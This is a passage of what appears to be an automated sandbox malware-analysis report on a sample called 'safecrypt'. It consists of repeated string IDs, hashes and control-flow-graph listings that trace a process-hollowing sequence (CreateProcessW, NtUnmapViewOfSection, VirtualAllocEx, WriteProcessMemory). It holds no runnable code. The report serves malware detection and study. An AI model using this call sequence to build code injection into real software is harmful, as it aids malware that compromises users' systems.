                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 3e3bddde923975dd5a921fc79769a1c67ba57d68f34712feb84f8e944cdfdcd1
                    • Instruction ID: 1d078ecc69b228449c53b9ebeb12025a9a1071e8ddd034582500317635d8e3bc
                    • Opcode Fuzzy Hash: 3e3bddde923975dd5a921fc79769a1c67ba57d68f34712feb84f8e944cdfdcd1
                    • Instruction Fuzzy Hash: 2CE16A31A18606EEEF1EB7618C12F3D799ABB43B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2006 26818e3-26818ea 2007 26818ec-268195b call 268003a call 26805f3 * 2 call 2680702 2006->2007 2008 2681961-2681976 call 2681983 2006->2008 2007->2008 2015 2681978-2681979 2008->2015 2016 26819e4-26819e9 2008->2016 2018 26819eb-26819f6 call 2680702 2015->2018 2019 268197c-2681980 2015->2019 2016->2018 2021 26819fb-2681a13 call 2681a22 2018->2021 2019->2021 2022 2681982-2681999 2019->2022 2052 2681a59 2021->2052 2053 2681a16-2681a38 2021->2053 2028 268199b-26819ba call 268003a 2022->2028 2029 26819bc-26819e2 call 26805f3 * 2 2022->2029 2028->2029 2029->2016 2058 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 2052->2058 2053->2058 2060 2681a3a-2681a54 call 268003a 2053->2060 2090 2681b0f-2681b10 2058->2090 2091 2681b74 2058->2091 2060->2052 2092 2681b12-2681b13 2090->2092 2093 2681b77-2681b83 2090->2093 2094 2681b75 2091->2094 2095 2681b74 call 26805f3 2091->2095 2096 2681b84 2092->2096 2097 2681b15-2681b31 2092->2097 2100 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 2093->2100 2098 2681b7a-2681b83 2094->2098 2099 2681b75 call 26805f3 2094->2099 2095->2094 2096->2100 2105 2681b33-2681b52 call 268003a 2097->2105 2106 2681b54-2681b75 call 26805f3 * 2 2097->2106 2098->2100 2099->2098 2121 2681be0-2681be3 2100->2121 2122 2681c35-2681c39 call 26805f3 2100->2122 2105->2106 2106->2098 2126 2681c3b 2121->2126 2127 2681be5-2681c08 2121->2127 2130 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 2122->2130 2126->2130 2132 2681c0a-2681c29 call 268003a 2127->2132 2133 2681c2b-2681c34 2127->2133 2151 2681cc8-2681ce7 call 268003a 2130->2151 2152 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 2130->2152 2132->2133 2133->2122 2151->2152 2174 2681dd9 2152->2174 2175 2681d70-2681d78 2152->2175 2177 2681dda 2174->2177 2178 2681dd9 call 26805f3 2174->2178 2182 2681d7a-2681d7d 2175->2182 2183 2681dc7-2681dda call 26805f3 * 2 2175->2183 2180 2681ddf-2681df3 call 2680702 2177->2180 2181 2681dda call 26805f3 2177->2181 2178->2177 2185 2681df8-2681e54 WriteProcessMemory call 2681e3e 2180->2185 2181->2180 2182->2185 2186 2681d7f-2681d96 2182->2186 2183->2180 2211 2681e56-2681e75 call 268003a 2185->2211 2212 2681e77-2681ec3 call 26805f3 * 2 call 2680702 2185->2212 2192 2681d98-2681db7 call 268003a 2186->2192 2193 2681db9-2681dc3 2186->2193 2192->2193 2193->2183 2211->2212
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 13ac511e3b97632219b7079de2c1df4c8da071d1e6ef7d73833f49ba561644f3
                    • Instruction ID: 930d032f0560f9c73521621fe6a6237e183a42d50e31c78f8f8748a6e2fa2a84
                    • Opcode Fuzzy Hash: 13ac511e3b97632219b7079de2c1df4c8da071d1e6ef7d73833f49ba561644f3
                    • Instruction Fuzzy Hash: F3E18B31A18606EEEF1EB7618C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2230 26818ff-2681976 call 268003a call 26805f3 * 2 call 2680702 call 2681983 2255 2681978-2681979 2230->2255 2256 26819e4-26819e9 2230->2256 2257 26819eb-26819f6 call 2680702 2255->2257 2258 268197c-2681980 2255->2258 2256->2257 2259 26819fb-2681a13 call 2681a22 2257->2259 2258->2259 2260 2681982-2681999 2258->2260 2282 2681a59 2259->2282 2283 2681a16-2681a38 2259->2283 2264 268199b-26819ba call 268003a 2260->2264 2265 26819bc-26819e2 call 26805f3 * 2 2260->2265 2264->2265 2265->2256 2286 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 2282->2286 2283->2286 2288 2681a3a-2681a54 call 268003a 2283->2288 2313 2681b0f-2681b10 2286->2313 2314 2681b74 2286->2314 2288->2282 2315 2681b12-2681b13 2313->2315 2316 2681b77-2681b83 2313->2316 2317 2681b75 2314->2317 2318 2681b74 call 26805f3 2314->2318 2319 2681b84 2315->2319 2320 2681b15-2681b31 2315->2320 2323 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 2316->2323 2321 2681b7a-2681b83 2317->2321 2322 2681b75 call 26805f3 2317->2322 2318->2317 2319->2323 2328 2681b33-2681b52 call 268003a 2320->2328 2329 2681b54-2681b75 call 26805f3 * 2 2320->2329 2321->2323 2322->2321 2344 2681be0-2681be3 2323->2344 2345 2681c35-2681c39 call 26805f3 2323->2345 2328->2329 2329->2321 2349 2681c3b 2344->2349 2350 2681be5-2681c08 2344->2350 2353 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 2345->2353 2349->2353 2355 2681c0a-2681c29 call 268003a 2350->2355 2356 2681c2b-2681c34 2350->2356 2374 2681cc8-2681ce7 call 268003a 2353->2374 2375 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 2353->2375 2355->2356 2356->2345 2374->2375 2397 2681dd9 2375->2397 2398 2681d70-2681d78 2375->2398 2400 2681dda 2397->2400 2401 2681dd9 call 26805f3 2397->2401 2405 2681d7a-2681d7d 2398->2405 2406 2681dc7-2681dda call 26805f3 * 2 2398->2406 2403 2681ddf-2681df3 call 2680702 2400->2403 2404 2681dda call 26805f3 2400->2404 2401->2400 2408 2681df8-2681e54 WriteProcessMemory call 2681e3e 2403->2408 2404->2403 2405->2408 2409 2681d7f-2681d96 2405->2409 2406->2403 2434 2681e56-2681e75 call 268003a 2408->2434 2435 2681e77-2681ec3 call 26805f3 * 2 call 2680702 2408->2435 2415 2681d98-2681db7 call 268003a 2409->2415 2416 2681db9-2681dc3 2409->2416 2415->2416 2416->2406 2434->2435
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 44534e1739558bd4d8e4f40cb5f456b0580b39dccd1a8b05739890721c9f1af5
                    • Instruction ID: 93dd4ecb777389b5d059fbbd57d8ee923c3f5ab2e5d6ce1eec1036735625f3f6
                    • Opcode Fuzzy Hash: 44534e1739558bd4d8e4f40cb5f456b0580b39dccd1a8b05739890721c9f1af5
                    • Instruction Fuzzy Hash: 11D16A31A18606EEEF1EB7618C11F3D799ABB83B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2453 268191a-2681976 call 26805f3 * 2 call 2680702 call 2681983 2473 2681978-2681979 2453->2473 2474 26819e4-26819e9 2453->2474 2475 26819eb-26819f6 call 2680702 2473->2475 2476 268197c-2681980 2473->2476 2474->2475 2477 26819fb-2681a13 call 2681a22 2475->2477 2476->2477 2478 2681982-2681999 2476->2478 2500 2681a59 2477->2500 2501 2681a16-2681a38 2477->2501 2482 268199b-26819ba call 268003a 2478->2482 2483 26819bc-26819e2 call 26805f3 * 2 2478->2483 2482->2483 2483->2474 2504 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 2500->2504 2501->2504 2506 2681a3a-2681a54 call 268003a 2501->2506 2531 2681b0f-2681b10 2504->2531 2532 2681b74 2504->2532 2506->2500 2533 2681b12-2681b13 2531->2533 2534 2681b77-2681b83 2531->2534 2535 2681b75 2532->2535 2536 2681b74 call 26805f3 2532->2536 2537 2681b84 2533->2537 2538 2681b15-2681b31 2533->2538 2541 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 2534->2541 2539 2681b7a-2681b83 2535->2539 2540 2681b75 call 26805f3 2535->2540 2536->2535 2537->2541 2546 2681b33-2681b52 call 268003a 2538->2546 2547 2681b54-2681b75 call 26805f3 * 2 2538->2547 2539->2541 2540->2539 2562 2681be0-2681be3 2541->2562 2563 2681c35-2681c39 call 26805f3 2541->2563 2546->2547 2547->2539 2567 2681c3b 2562->2567 2568 2681be5-2681c08 2562->2568 2571 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 2563->2571 2567->2571 2573 2681c0a-2681c29 call 268003a 2568->2573 2574 2681c2b-2681c34 2568->2574 2592 2681cc8-2681ce7 call 268003a 2571->2592 2593 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 2571->2593 2573->2574 2574->2563 2592->2593 2615 2681dd9 2593->2615 2616 2681d70-2681d78 2593->2616 2618 2681dda 2615->2618 2619 2681dd9 call 26805f3 2615->2619 2623 2681d7a-2681d7d 2616->2623 2624 2681dc7-2681dda call 26805f3 * 2 2616->2624 2621 2681ddf-2681df3 call 2680702 2618->2621 2622 2681dda call 26805f3 2618->2622 2619->2618 2626 2681df8-2681e54 WriteProcessMemory call 2681e3e 2621->2626 2622->2621 2623->2626 2627 2681d7f-2681d96 2623->2627 2624->2621 2652 2681e56-2681e75 call 268003a 2626->2652 2653 2681e77-2681ec3 call 26805f3 * 2 call 2680702 2626->2653 2633 2681d98-2681db7 call 268003a 2627->2633 2634 2681db9-2681dc3 2627->2634 2633->2634 2634->2624 2652->2653
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: ccb24aa4882c60ce5b11b606c8c505bbc98585d82854acb9a1576a98cf526ada
                    • Instruction ID: cb42b0ff89a82a70428d87bcccedc94811c3366278f288a0bdea2b01284130ef
                    • Opcode Fuzzy Hash: ccb24aa4882c60ce5b11b606c8c505bbc98585d82854acb9a1576a98cf526ada
                    • Instruction Fuzzy Hash: 3AD17B31A18606EEEF1EB7618C11F3D799ABB83B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2671 268193f-2681976 call 2680702 call 2681983 2681 2681978-2681979 2671->2681 2682 26819e4-26819e9 2671->2682 2683 26819eb-26819f6 call 2680702 2681->2683 2684 268197c-2681980 2681->2684 2682->2683 2685 26819fb-2681a13 call 2681a22 2683->2685 2684->2685 2686 2681982-2681999 2684->2686 2708 2681a59 2685->2708 2709 2681a16-2681a38 2685->2709 2690 268199b-26819ba call 268003a 2686->2690 2691 26819bc-26819e2 call 26805f3 * 2 2686->2691 2690->2691 2691->2682 2712 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 2708->2712 2709->2712 2714 2681a3a-2681a54 call 268003a 2709->2714 2739 2681b0f-2681b10 2712->2739 2740 2681b74 2712->2740 2714->2708 2741 2681b12-2681b13 2739->2741 2742 2681b77-2681b83 2739->2742 2743 2681b75 2740->2743 2744 2681b74 call 26805f3 2740->2744 2745 2681b84 2741->2745 2746 2681b15-2681b31 2741->2746 2749 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 2742->2749 2747 2681b7a-2681b83 2743->2747 2748 2681b75 call 26805f3 2743->2748 2744->2743 2745->2749 2754 2681b33-2681b52 call 268003a 2746->2754 2755 2681b54-2681b75 call 26805f3 * 2 2746->2755 2747->2749 2748->2747 2770 2681be0-2681be3 2749->2770 2771 2681c35-2681c39 call 26805f3 2749->2771 2754->2755 2755->2747 2775 2681c3b 2770->2775 2776 2681be5-2681c08 2770->2776 2779 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 2771->2779 2775->2779 2781 2681c0a-2681c29 call 268003a 2776->2781 2782 2681c2b-2681c34 2776->2782 2800 2681cc8-2681ce7 call 268003a 2779->2800 2801 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 2779->2801 2781->2782 2782->2771 2800->2801 2823 2681dd9 2801->2823 2824 2681d70-2681d78 2801->2824 2826 2681dda 2823->2826 2827 2681dd9 call 26805f3 2823->2827 2831 2681d7a-2681d7d 2824->2831 2832 2681dc7-2681dda call 26805f3 * 2 2824->2832 2829 2681ddf-2681df3 call 2680702 2826->2829 2830 2681dda call 26805f3 2826->2830 2827->2826 2834 2681df8-2681e54 WriteProcessMemory call 2681e3e 2829->2834 2830->2829 2831->2834 2835 2681d7f-2681d96 2831->2835 2832->2829 2860 2681e56-2681e75 call 268003a 2834->2860 2861 2681e77-2681ec3 call 26805f3 * 2 call 2680702 2834->2861 2841 2681d98-2681db7 call 268003a 2835->2841 2842 2681db9-2681dc3 2835->2842 2841->2842 2842->2832 2860->2861
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 6132133a2cb6089e524795df161b0a12a6a8752c04f0a5f07dcc0d578049287a
                    • Instruction ID: 2bb8d234c418e71236d99d44fe6e76c9fbdc635385f8c44d1ed5a231a5b6b47f
                    • Opcode Fuzzy Hash: 6132133a2cb6089e524795df161b0a12a6a8752c04f0a5f07dcc0d578049287a
                    • Instruction Fuzzy Hash: 25D16931A18616EEEF1EB7608C12F3D799ABB43B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2879 2681946-2681976 call 2680702 call 2681983 2889 2681978-2681979 2879->2889 2890 26819e4-26819e9 2879->2890 2891 26819eb-26819f6 call 2680702 2889->2891 2892 268197c-2681980 2889->2892 2890->2891 2893 26819fb-2681a13 call 2681a22 2891->2893 2892->2893 2894 2681982-2681999 2892->2894 2916 2681a59 2893->2916 2917 2681a16-2681a38 2893->2917 2898 268199b-26819ba call 268003a 2894->2898 2899 26819bc-26819e2 call 26805f3 * 2 2894->2899 2898->2899 2899->2890 2920 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 2916->2920 2917->2920 2922 2681a3a-2681a54 call 268003a 2917->2922 2947 2681b0f-2681b10 2920->2947 2948 2681b74 2920->2948 2922->2916 2949 2681b12-2681b13 2947->2949 2950 2681b77-2681b83 2947->2950 2951 2681b75 2948->2951 2952 2681b74 call 26805f3 2948->2952 2953 2681b84 2949->2953 2954 2681b15-2681b31 2949->2954 2957 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 2950->2957 2955 2681b7a-2681b83 2951->2955 2956 2681b75 call 26805f3 2951->2956 2952->2951 2953->2957 2962 2681b33-2681b52 call 268003a 2954->2962 2963 2681b54-2681b75 call 26805f3 * 2 2954->2963 2955->2957 2956->2955 2978 2681be0-2681be3 2957->2978 2979 2681c35-2681c39 call 26805f3 2957->2979 2962->2963 2963->2955 2983 2681c3b 2978->2983 2984 2681be5-2681c08 2978->2984 2987 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 2979->2987 2983->2987 2989 2681c0a-2681c29 call 268003a 2984->2989 2990 2681c2b-2681c34 2984->2990 3008 2681cc8-2681ce7 call 268003a 2987->3008 3009 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 2987->3009 2989->2990 2990->2979 3008->3009 3031 2681dd9 3009->3031 3032 2681d70-2681d78 3009->3032 3034 2681dda 3031->3034 3035 2681dd9 call 26805f3 3031->3035 3039 2681d7a-2681d7d 3032->3039 3040 2681dc7-2681dda call 26805f3 * 2 3032->3040 3037 2681ddf-2681df3 call 2680702 3034->3037 3038 2681dda call 26805f3 3034->3038 3035->3034 3042 2681df8-2681e54 WriteProcessMemory call 2681e3e 3037->3042 3038->3037 3039->3042 3043 2681d7f-2681d96 3039->3043 3040->3037 3068 2681e56-2681e75 call 268003a 3042->3068 3069 2681e77-2681ec3 call 26805f3 * 2 call 2680702 3042->3069 3049 2681d98-2681db7 call 268003a 3043->3049 3050 2681db9-2681dc3 3043->3050 3049->3050 3050->3040 3068->3069
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: f495496037286432184363db322da8c27114b56816285eb4577a9db5ad212fdd
                    • Instruction ID: c7bb00a616c73e8a1f5a08431dd7700675d1a1f22cb299fd4ca13c5a31f2318b
                    • Opcode Fuzzy Hash: f495496037286432184363db322da8c27114b56816285eb4577a9db5ad212fdd
                    • Instruction Fuzzy Hash: B4D16932A18606EEEB1EB7608C11F3D799ABB43B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3087 2681963-2681976 call 2681983 3091 2681978-2681979 3087->3091 3092 26819e4-26819e9 3087->3092 3093 26819eb-26819f6 call 2680702 3091->3093 3094 268197c-2681980 3091->3094 3092->3093 3095 26819fb-2681a13 call 2681a22 3093->3095 3094->3095 3096 2681982-2681999 3094->3096 3118 2681a59 3095->3118 3119 2681a16-2681a38 3095->3119 3100 268199b-26819ba call 268003a 3096->3100 3101 26819bc-26819e2 call 26805f3 * 2 3096->3101 3100->3101 3101->3092 3122 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 3118->3122 3119->3122 3124 2681a3a-2681a54 call 268003a 3119->3124 3149 2681b0f-2681b10 3122->3149 3150 2681b74 3122->3150 3124->3118 3151 2681b12-2681b13 3149->3151 3152 2681b77-2681b83 3149->3152 3153 2681b75 3150->3153 3154 2681b74 call 26805f3 3150->3154 3155 2681b84 3151->3155 3156 2681b15-2681b31 3151->3156 3159 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 3152->3159 3157 2681b7a-2681b83 3153->3157 3158 2681b75 call 26805f3 3153->3158 3154->3153 3155->3159 3164 2681b33-2681b52 call 268003a 3156->3164 3165 2681b54-2681b75 call 26805f3 * 2 3156->3165 3157->3159 3158->3157 3180 2681be0-2681be3 3159->3180 3181 2681c35-2681c39 call 26805f3 3159->3181 3164->3165 3165->3157 3185 2681c3b 3180->3185 3186 2681be5-2681c08 3180->3186 3189 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 3181->3189 3185->3189 3191 2681c0a-2681c29 call 268003a 3186->3191 3192 2681c2b-2681c34 3186->3192 3210 2681cc8-2681ce7 call 268003a 3189->3210 3211 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 3189->3211 3191->3192 3192->3181 3210->3211 3233 2681dd9 3211->3233 3234 2681d70-2681d78 3211->3234 3236 2681dda 3233->3236 3237 2681dd9 call 26805f3 3233->3237 3241 2681d7a-2681d7d 3234->3241 3242 2681dc7-2681dda call 26805f3 * 2 3234->3242 3239 2681ddf-2681df3 call 2680702 3236->3239 3240 2681dda call 26805f3 3236->3240 3237->3236 3244 2681df8-2681e54 WriteProcessMemory call 2681e3e 3239->3244 3240->3239 3241->3244 3245 2681d7f-2681d96 3241->3245 3242->3239 3270 2681e56-2681e75 call 268003a 3244->3270 3271 2681e77-2681ec3 call 26805f3 * 2 call 2680702 3244->3271 3251 2681d98-2681db7 call 268003a 3245->3251 3252 2681db9-2681dc3 3245->3252 3251->3252 3252->3242 3270->3271
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: e605bd3c0e246f08737236fa7de905c815f15f95786545e65953fbd56888bc4b
                    • Instruction ID: dda56dae8ccc506f102df62dfda70c06002a2b0b2315a3e431d63aee0bf494e7
                    • Opcode Fuzzy Hash: e605bd3c0e246f08737236fa7de905c815f15f95786545e65953fbd56888bc4b
                    • Instruction Fuzzy Hash: 56D16832A18616EEEB1EB760CC11F3D799ABB43B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 748bf721d01c502860e9775896c194a095d8b5eebc9736f8a83b4fbbb4f5a150
                    • Instruction ID: 8b28f664a0d45277b9dd0af3559183c956a1c3118fda6474ffea5a0f3e699feb
                    • Opcode Fuzzy Hash: 748bf721d01c502860e9775896c194a095d8b5eebc9736f8a83b4fbbb4f5a150
                    • Instruction Fuzzy Hash: 61C16931A18606EEEB1EB761CC11F3D799ABB43B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 424baeb5f877a7e89357698537ebc65fbf47ae713fa12991aab065b5bf8d565f
                    • Instruction ID: 1056e7aa6fc1aeb7ac0e806d4d4b08cc8bccd99e16ecff4a993e1e0986568105
                    • Opcode Fuzzy Hash: 424baeb5f877a7e89357698537ebc65fbf47ae713fa12991aab065b5bf8d565f
                    • Instruction Fuzzy Hash: 68C17C32A18606EEEB1EB761CC11F3D799ABB83B05F045BDDA10F9A181FE784603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: b7de26201dfb25a511b6ba7062084ab4186202995379a929b75e60b010e66dc8
                    • Instruction ID: 7aacf5afdd4c380efe702f8129c8866a1ef0028b433e988aea80e2a347b16d64
                    • Opcode Fuzzy Hash: b7de26201dfb25a511b6ba7062084ab4186202995379a929b75e60b010e66dc8
                    • Instruction Fuzzy Hash: 9DC18B32A18605EEEB1EB760CC11F3D799ABB43B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: de8202db822ea1921288a02b86e575b5a62394531f140fd65f8fef09a0339bd6
                    • Instruction ID: 0f677b8d12a8beedef29314bfd82dd002dea2d12d6a2ba52a9902ffa35d62862
                    • Opcode Fuzzy Hash: de8202db822ea1921288a02b86e575b5a62394531f140fd65f8fef09a0339bd6
                    • Instruction Fuzzy Hash: E9C17B32A18616EEEB1EB7608C11F3D799ABB43B05F045BDDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 2f902628984d4289033428fb04088459c95369ca4467549356379d6328fdebd6
                    • Instruction ID: 6e5ddbc6f91dc53b2af2b691b0aa6ec5653b8b429e508ce345d3e0620eb36d97
                    • Opcode Fuzzy Hash: 2f902628984d4289033428fb04088459c95369ca4467549356379d6328fdebd6
                    • Instruction Fuzzy Hash: 0AB17A32A18615EEEB1EB7608C11F3D799ABB43B05F045BDDE10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 5eec219bc5f763040baa4ce212192e92bfdb3eb2bc2b66e16641bb9413b8d155
                    • Instruction ID: 4e6c4eab4828eb16741d7a36df9ebd8eb504c047ca6dbf2ebd84479105c5df11
                    • Opcode Fuzzy Hash: 5eec219bc5f763040baa4ce212192e92bfdb3eb2bc2b66e16641bb9413b8d155
                    • Instruction Fuzzy Hash: D9C16C32A18605EEEB1EB7608C11F3D79AABB43B05F0457DDA10F9A181FE784603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 59047b311847c9dfcd54b4609c3ec7ebfc526144f90ef211ff4e0e9fff93ca8b
                    • Instruction ID: fd14c95ecf47d080a2bc5e0531799ca47eb6ab351f241f9a48bf83ca13602afb
                    • Opcode Fuzzy Hash: 59047b311847c9dfcd54b4609c3ec7ebfc526144f90ef211ff4e0e9fff93ca8b
                    • Instruction Fuzzy Hash: E5B18B31A18605EEEB1EB7608C11F3D79AABB43B05F0457DDE10F9A182FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: c8ee5f17dcb5f28ae2733c94792cadeed04190c56f688cabaa2e6329671c8746
                    • Instruction ID: 55833e3560df45767479e35d6293273bff4ab6f465f55fb9571a8dc12470789b
                    • Opcode Fuzzy Hash: c8ee5f17dcb5f28ae2733c94792cadeed04190c56f688cabaa2e6329671c8746
                    • Instruction Fuzzy Hash: 5BB18C32A18616EEEB1EB7608C11F3D79AABB43B05F0457DDE10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: f87226f02c6b9537023dbcfd3e48d645b2788d22ba3f4075fe87e6e0772af295
                    • Instruction ID: a2d7c560587cdfd82ef2a0e505af4a4c79a537237b7cc020f0f7e26ed8468b20
                    • Opcode Fuzzy Hash: f87226f02c6b9537023dbcfd3e48d645b2788d22ba3f4075fe87e6e0772af295
